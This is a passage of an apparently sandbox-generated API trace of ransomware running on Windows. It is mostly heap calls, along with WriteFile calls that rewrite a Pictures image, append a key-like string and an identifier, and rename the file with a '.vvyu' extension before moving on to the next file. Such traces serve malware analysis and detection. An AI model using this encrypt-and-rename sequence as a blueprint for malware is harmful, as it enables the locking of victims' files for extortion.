0x2e95c90 [0195.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea06a0 [0195.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0195.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0195.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0195.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.203] GetCurrentThreadId () returned 0x66c [0195.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0195.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0195.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0195.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0195.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0195.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cd8 [0195.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0195.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0195.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0195.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c78 [0195.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0195.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0195.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0195.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0195.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c90 [0195.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0195.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0195.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0195.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c60 [0195.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0195.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cf0 [0195.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0195.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cc0 [0195.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ca8 [0195.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d08 [0195.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ca8 | out: hHeap=0x620000) returned 1 [0195.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ca8 [0195.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cc0 | out: hHeap=0x620000) returned 1 [0195.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0195.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0195.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0195.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0195.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c78 [0195.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea4a68 [0195.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cd8 | out: hHeap=0x620000) returned 1 [0195.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0195.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d08 | out: hHeap=0x620000) returned 1 [0195.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea4c78 [0195.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0195.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0195.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0195.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea4e90 [0195.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0195.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0195.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0195.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0195.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4c78 | out: hHeap=0x620000) returned 1 [0195.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4e90 | out: hHeap=0x620000) returned 1 [0195.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ca8 | out: hHeap=0x620000) returned 1 [0195.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cf0 | out: hHeap=0x620000) returned 1 [0195.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c90 | out: hHeap=0x620000) returned 1 [0195.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c60 | out: hHeap=0x620000) returned 1 [0195.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0195.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0195.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c48 | out: hHeap=0x620000) returned 1 [0195.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0195.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0195.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0195.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0195.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0195.216] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xc082, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xc082, lpOverlapped=0x0) returned 1 [0195.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0195.217] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xc087, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.217] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0195.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea4a68 [0195.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea4a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea4e98 [0195.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.218] WriteFile (in: hFile=0x568, lpBuffer=0x2ea4e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea4e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4e98 | out: hHeap=0x620000) returned 1 [0195.219] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.219] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.219] CloseHandle (hObject=0x568) returned 1 [0195.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea4a68 [0195.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.221] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ZzmcSYQ7d6yY4Z.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\zzmcsyq7d6yy4z.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ZzmcSYQ7d6yY4Z.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\zzmcsyq7d6yy4z.png.vvyu")) returned 1 [0195.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.222] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0195.225] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9454bc60, ftCreationTime.dwHighDateTime=0x1d89abc, ftLastAccessTime.dwLowDateTime=0xd731c3e0, ftLastAccessTime.dwHighDateTime=0x1d8a217, ftLastWriteTime.dwLowDateTime=0xd731c3e0, ftLastWriteTime.dwHighDateTime=0x1d8a217, nFileSizeHigh=0x0, nFileSizeLow=0xc087, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZzmcSYQ7d6yY4Z.png", cAlternateFileName="ZZMCSY~1.PNG")) returned 0 [0195.225] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0195.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0195.226] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0195.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0195.226] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0195.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0195.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.240] HeapFree (in: 